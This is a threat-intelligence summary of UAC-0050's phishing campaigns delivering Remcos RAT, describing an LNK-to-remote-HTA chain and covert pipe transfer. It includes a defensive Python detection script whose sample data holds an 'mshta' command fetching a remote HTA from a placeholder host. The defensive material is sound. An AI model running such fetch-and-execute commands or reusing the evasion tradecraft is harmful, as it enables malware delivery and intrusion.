UAC-0050 [1] [2] [3] [4] [5] [6], a threat actor active since 2020 [2] [3] [4], is currently using phishing attacks to distribute the Remcos RAT malware [2] [3] [4] [5]. This group has a history of targeting Ukrainian and Polish entities through social engineering campaigns [2] [3] [4] [5], utilizing phishing emails that impersonate legitimate organizations [1].


In February 2023 [1] [3] [4], UAC-0050 launched a phishing campaign that delivered the Remcos RAT. This trojan has been distributed in multiple phishing waves [1] [2] [3] [4], including one that also deployed an information stealer called Meduza Stealer [2] [3] [4]. The initial attack vector is phishing emails disguised as job offers for Ukrainian military personnel [6]. The attack uses an LNK file to collect information about installed antivirus products and to execute an HTML application (HTA) fetched from a remote server [2] [3] [4]. This leads to the download of two files [3] [4], one of which establishes persistence and launches the Remcos RAT [3] [4]. The RAT can harvest system data and login credentials stored by web browsers [2] [3] [4]. UAC-0050 has shown considerable adaptability in its operational methods, evading EDR and antivirus detection by using Windows pipes for covert data transfer between processes. Because decrypted data moves between processes through the pipe rather than touching disk, the technique marks a notable advance in UAC-0050's tradecraft [1].
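To make the chain above concrete from the defender's side, here is an added illustration (not code from the report or from any of the cited sources) that runs a small detection pass over constructed Sysmon-style events: a script host pulling an HTA from a remote server, a script host spawned directly from the shell as an LNK double-click would be, and a named pipe opened by a binary running from a user-writable path. The event field names, the pipe name, the domain and the file paths are all assumed placeholders; real Sysmon XML would need parsing first.

```python
"""Added illustration: detection pass over constructed Sysmon-like events
(IDs 1 = process creation, 17 = pipe created).  Field names are assumed."""
import re

# mshta.exe and friends fetching a .hta over HTTP(S) is the HTA step described above
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Paths a low-privileged user can write to; a pipe server living here is suspicious
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\appdata|programdata|windows\\temp)\\", re.I)


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def detect(events):
    """Return (rule, pid, detail) tuples for events matching the described chain."""
    findings = []
    for ev in events:
        if ev["id"] == 1:  # process creation
            img, parent = _basename(ev["image"]), _basename(ev["parent"])
            if img in SCRIPT_HOSTS and REMOTE_HTA.search(ev["cmdline"]):
                findings.append(("remote_hta", ev["pid"], ev["cmdline"]))
            elif img in SCRIPT_HOSTS and parent == "explorer.exe":
                # An LNK launched by double-click surfaces as explorer.exe -> script host
                findings.append(("script_host_from_shell", ev["pid"], ev["cmdline"]))
        elif ev["id"] == 17 and USER_WRITABLE.search(ev["image"]):  # pipe created
            findings.append(("pipe_from_user_path", ev["pid"], ev["pipe"]))
    return findings


# Constructed sample events; the domain, pipe name and paths are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 4120, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://placeholder.invalid/offer.hta"},
    {"id": 1, "pid": 4130, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"id": 17, "pid": 4150, "image": r"C:\Users\alice\AppData\Roaming\svc\host.exe",
     "pipe": r"\placeholder_pipe"},
    {"id": 17, "pid": 700, "image": r"C:\Windows\System32\lsass.exe", "pipe": r"\lsass"},
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:24} pid={pid} {detail}")
```

Two of the four sample events fire (the remote HTA fetch and the pipe from the user profile); the two benign system events do not.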


The activities of UAC-0050 pose a significant threat to Ukrainian and Polish entities. It is crucial for organizations to remain vigilant against phishing attacks and implement robust security measures to mitigate the risk of malware infections. The integration of a pipe method for covert data transfer highlights the need for continuous improvement in cybersecurity defenses to stay ahead of evolving threat actors like UAC-0050.